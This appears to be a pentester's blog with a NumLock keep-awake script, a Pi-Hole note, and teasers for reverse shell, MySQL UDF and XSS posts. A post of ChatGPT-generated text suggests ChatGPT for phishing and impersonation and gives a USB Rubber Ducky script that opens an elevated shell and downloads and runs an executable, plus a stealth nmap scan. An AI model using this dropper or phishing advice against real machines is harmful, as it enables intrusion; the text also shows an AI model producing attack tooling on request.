Simple keystroke to prevent sleep

Standard
A simple script to double-tap on the numb lock to prevent the machine to sleep
This is a very simple script which can prevent the machine to sleep. 

Python 

import pyautogui
import time

while True:
    pyautogui.press('numlock')
    pyautogui.press('numlock')
    time.sleep(60)
Number lock key double tap
Windows Powershell

while ($true) {
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
    Start-Sleep -Seconds 60
}



Here is the same script written in PowerShell without using the System.Windows.Forms.SendKeys class:

while ($true) {
    Add-Type -AssemblyName System.Windows.Forms
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    [System.Windows.Forms.SendKeys]::Send("{NUMLOCK}")
    Start-Sleep -Seconds 60
}


Here is the same script written in PowerShell using the SendWait() method from the System.Windows.Forms.SendKeys class:

Add-Type -AssemblyName System.Windows.Forms
while ($true) {
[System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
[System.Windows.Forms.SendKeys]::SendWait("{NUMLOCK}")
Start-Sleep -Seconds 60
}

ChatGPT in Red Teaming

Standard

Disclaimer: All Text below is generated by chatGPT

How can chatGPT help in red teaming?

ChatGPT is a variant of the GPT (Generative Pre-training Transformer) language model that is specifically designed to generate chatbot responses based on a given prompt. It can be used in red teaming to generate convincing responses during social engineering attacks or to impersonate real people in online communication.

For example, an attacker could use ChatGPT to generate responses in a chat conversation with a target, pretending to be a trusted individual or a customer service representative. They could also use it to generate phishing emails or other written communication that is designed to trick the target into divulging sensitive information or performing a specific action.

It is important to note that ChatGPT, like any other language model, is not capable of independently carrying out attacks or making decisions. It is simply a tool that can be used to generate text based on a given prompt. It is up to the attacker to use this tool in a way that is effective and aligned with their goals.

Write a duckyscript to open powershell with admin privileges and download execute exe file ?

Here is a DuckyScript that will open a command prompt with administrative privileges and then download and execute an EXE file:

DELAY 1000
GUI r
DELAY 200
STRING powershell
DELAY 200
CONTROL SHIFT ENTER
DELAY 200
STRING Start-Process cmd -Verb runAs
DELAY 200
ENTER
DELAY 200
STRING powershell -Command "& {Invoke-WebRequest -OutFile c:\temp\example.exe https://example.com/example.exe}"
DELAY 200
ENTER
DELAY 200
STRING c:\temp\example.exe
DELAY 200
ENTER

This script will first delay for 1 second (1000 milliseconds). It will then press the “Windows” key and the “r” key to open the “Run” dialog. It will then type “powershell” and press “Enter” to open a PowerShell window.

Next, it will press “Control,” “Shift,” and “Enter” simultaneously to open a command prompt with administrative privileges. It will then type the command “Start-Process cmd -Verb runAs” and press “Enter” to open a command prompt with administrative privileges.

Once the command prompt is open, the script will use the “powershell” command to download the EXE file from the specified URL and save it to the “c:\temp” directory. Finally, it will execute the EXE file by typing its path and pressing “Enter.”

Note that this script assumes that the USB Rubber Ducky is being used on a Windows system. If you are using a different operating system, you may need to modify the script accordingly.

Nmap scan to scan 192.168.1.1/24 all ports in stealth mode ?

To scan all ports on all hosts in the 192.168.1.1/24 subnet in stealth mode using nmap, you can use the following command:

Copy codenmap -sS 192.168.1.1/24

The “-sS” option tells nmap to perform a SYN scan, which is a type of stealth scan that does not send a full TCP connection request to the target host. This can help to evade detection by firewalls and other security measures that are designed to detect and block port scans.

By default, nmap will scan the most common 1,000 ports for each host. If you want to scan all 65535 possible ports, you can use the “-p-” option:

Copy codenmap -sS -p- 192.168.1.1/24

This will take longer to complete, as nmap will have to perform significantly more network traffic.

It is important to note that port scanning is often considered a potentially malicious activity, and you should only perform port scans on systems that you have permission to scan. Additionally, you should be aware of any laws or regulations in your jurisdiction that may prohibit or regulate port scanning.

Pi-Holed

Standard

Very recently I felt one of my virtual machines is infected by malware and I was thinking about restoring it to a clean snapshot but then I thought let’s find other ways to identify and block these types of attacks. There were few more issue I wanted to resolve on my network which includes blocking of advertisements on the pages I visit, blocking all malicious IOC over the network, etc, one of the game BattleField 4 which I play on PS4 wasn’t able to connect to online gaming due to blocking of DNS at ISP, etc.

I started doing my research where I found discovered “Pi-Hole”, Basically Pi-Hole is a network-wide Advertisement blocking solution (DNS Server) that can be installed on a virtual machine or on your own hardware e.g RaspberryPI 3 in my case.

Continue reading

Rubber Ducky

Standard

During my recent internal BlackBox testing, I got a chance to use the rubber ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case and it acts as a keyboard. The script written on the SD card is called ducky script which is very easy to understand.

Since there are a lot of write-ups on the internet about the ducky ill just be posting on of the script I used in my recent pen-testing. I hope you may find it useful.

The script is written keeping in mind that not all windows OS are the same, and hardware specifications are different as well. While using the default scripts at times the system was not able to type complete code, hence you will see many spaces and delays.


Reverse Shell

Continue reading

MySQL UDF Injection

Standard

While performing a web application penetration testing, at times you are able to find out the web application is running MySQL database through  “root” credentials. This is one of the biggest NO of security. In this case, we can get a root shell on the machine with just a few commands. Here comes my second cheat sheet so that I do not forget this anymore.

Web Shell MySQL

Continue reading

VLDPersonals Cross-Site Scripting XSS

Standard

# Exploit Title: VLD Personals – Cross Site Scripting ( Reflective ) with admin authentication.
# Notified VLD Personals Date: 02/FEB/2015

# Exploit Author: Mr T
# Exploit Authors Website: http://www.securitypentester.ninja
# Vendor Homepage: http://www.vldpersonals.com/
# Software Link: http://www.vldpersonals.com/clients/downloads.php
# Vulnerable Version: 2.7.1
# Fixed Version 2.7.2
# Tested on: Windows / Linux

XSS in "what" Parameter

XSS in “what” Parameter

Continue reading